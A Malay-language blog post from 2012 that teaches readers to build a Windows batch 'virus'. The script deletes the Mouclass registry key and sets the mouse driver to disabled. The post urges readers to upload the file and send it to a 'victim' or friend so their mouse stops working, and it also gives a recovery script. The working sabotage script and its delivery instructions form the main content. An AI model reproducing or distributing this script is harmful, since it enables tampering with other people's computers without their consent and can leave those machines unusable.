Thursday, 6 September 2012

Buat Virus Yang Akan Melumpuhkan Mouse!


Assalamualaikum dan salam sejahtera, entry kali ini aku nak share pulak dengan korang trick virus baru.
Virus ni fungsinya untuk disable/melumpuhkan mouse/tetikus mangsa!
Senang cerita mangsa tak dapat guna mouse dia.
note : trick ni rasanya hanya berkesan bagi mangsa yang gunakan desktop PC atau laptop yang menggunakan external mouse.Touch pad mungkin tak boleh.

Baiklah jom mula!


1. Copy code dibawah :
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

2. Paste ke dalam NOTEPAD dan save seperti :

File name : mouse.bat

Save as type : All Files (*.*)

3. Siap dah virus korang.Sekarang upload ke mana2 file hosting dan hantar kepada mangsa atau kawan korang.Bila dorang bukak ja file tu automatik virus tu akan berjalan dan BOOM! Mouse tak berfungsi >.<

Cara nak recover dari virus ni?

1. Copy dan paste dalam notepad code dibawah :
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1

2. Save sebagai :



File name : recover.bat
Save as type : All Files (*.*)

3. Buka file ni.Siap.



Sekian assalamualaikum....

tag - notepad virus codes, how to make a notepad virus, notepad virus prank, vb virus code, vb virus tutorial, computer mouse virus, crazy mouse virus, notepad virus code recover,how to recover from mouse virus,mouse virus recover
Item Reviewed: Buat Virus Yang Akan Melumpuhkan Mouse! Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com